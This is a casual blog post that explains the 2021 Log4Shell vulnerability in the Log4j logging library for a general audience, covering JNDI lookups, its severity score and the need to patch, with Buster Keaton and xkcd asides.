I found the image above when searching for a good image of fire, and it seemed just about perfect on multiple levels. Buster Keaton (https://en.wikipedia.org/wiki/Buster_Keaton) is one of those iconic figures whose impact on modern culture is impossible to even estimate, and the idea of him lighting his cigarette from a burning bomb-fuse seemed like a great metaphor for current events. Most will recognize his name or his face, whether or not they can link the two, and many will recognize him from the endless clips of him on the Internet, showing his extraordinary stunt work (https://www.youtube.com/watch?v=frYIj2FGmMA), and some may even have watched some of his films, but his real impact is on those who came later. Names of those who identify Keaton as a major influence include Orson Welles, Mel Brooks, and Jackie Chan (https://www.mentalfloss.com/article/75546/how-jackie-chan-draws-inspiration-classic-hollywood), each of whom has had an enormous direct influence themselves.

While I’ve been trying to post weekly, the last few weeks have been even busier than usual, so apologies for that. I’ve been busier than usual with home and holidays, but also the fact that the Internet is on fire.

But wait, don’t we hear about the Internet being on fire every few weeks?

Well, yes, but this time is different.

Erm, don’t we hear that as well, every few weeks?

Well, yes, but this time might actually be different.

Sure. Yeah. Whatever. So, what’s going on, and how is this different?

To start with, I’m talking about a vulnerability known as “Log4Shell” (https://en.wikipedia.org/wiki/Log4Shell), which exists in a logging utility known as Log4j (https://en.wikipedia.org/wiki/Log4j). It’s one of those tools that most non-technical people haven’t heard of, but which is embedded in just about everything.

To keep things as non-technical as I can, most computer systems have a need to generate log files to store information about key events which take place on the system. Examples of this include an online service which keeps a record of the fact that you changed the alias associated with your account from “Alice” to “Bob”, or that Alice last logged onto a social media account yesterday, or that Malice attempted to log into Bob’s account a week ago, but failed due to the MFA (https://www.til-technology.com/post/infosec-basics-multi-factor-authentication) on Bob’s account.

As expected, there is a lot of overlap around how people want to log data, so a developer named Ceki Gülcü created a utility known as Log4j (now managed by the Apache Software Foundation), which provides a flexible and consistent way of generating logs. Log4j is extremely useful and quite powerful, and appears in the popular Apache Logging Services (which is free and open-source), so it started to be used by a wide variety of developers in various programs, which were them used in other programs, and so on, until we have estimates of hundreds of millions devices which use the tool in some way.

So, Log4j is a very useful tool used in a lot of places. Interestingly, the risk of having such widely-used utilities embedded in everything has been discussed for years, perhaps most prophetically in the xkcd comic below:

And, as Steve Gibson of Security Now (https://www.til-technology.com/my-playlist) is fond of asking: “What could possibly go wrong?”

Which brings us to Log4Shell.

From 2013 until it’s removal in version 2.16.0, Log4J supported the use of the Java Naming and Directory Interface (JNDI), which allows the lookup of Java objects at runtime. This provides the ability to add information to the log dynamically, by adding a lookup request to pull information from elsewhere.

The problem, though, is that logs often use information provided by a user, which means that it’s possible to cause a system to go to an arbitrary URL, download that file, then execute it. This is arguably a type of “injection” attack, but the system is designed to work this way, so more a “feature” than a “bug”. As FYI, injection is included on the OWASP (Open Web Application Security Project) Top 10 (https://owasp.org/Top10/A03_2021-Injection/), but more amusingly described by (again) xkcd:

The practical upshot of this is that it is very easy to make a vulnerable computer download a program from anywhere you like, and then execute it, simply by adding instructions to a field which is logged using Log4j.

Examples of this (https://www.techradar.com/news/log4shell-can-hack-your-iphone-and-even-a-tesla) include one user changing his iPhone’s name, and another changing his Tesla’s name, which gives a taste of how widespread this issue is, and why the vulnerability (https://nvd.nist.gov/vuln/detail/CVE-2021-44228) has been given a CVSS (Common Vulnerability Scoring System) score of 10 (the maximum).

As for the internet being on fire, I’ve seen several researchers using the phrase, such as Wired (https://www.wired.com/story/log4j-flaw-hacking-internet/). The bottom line is that this is something that the general public can’t do much about, and the entire tech community seems to be focused on. We probably won’t know for months what the “real” impact is, but we know it’s bad, and we know that we need to fix it as fast as possible. Everything else is a prioritization exercise and avoiding panic.

You might remember that Y2K was NOT a catastrophic issue, despite the dire warnings ahead of it. The thing is, a major reason why it was not catastrophic was that the entire tech community spent years focused on it in advance of the event. There were problems, but mostly manageable.

Unfortunately, this is different. Malicious actors started attacking almost immediately, and will continue to do until all systems are patched (ie, until the end of time, practically). It’s a near certainty that we will hear about companies affected by this now, but not disclosed until later. The important point is to recognize the urgency, but not to panic, and to make sure you keep your systems up to date.

Beyond that, what can we do when the Internet is on fire?

The answer, of course, is to roast marshmallows!

Cheers!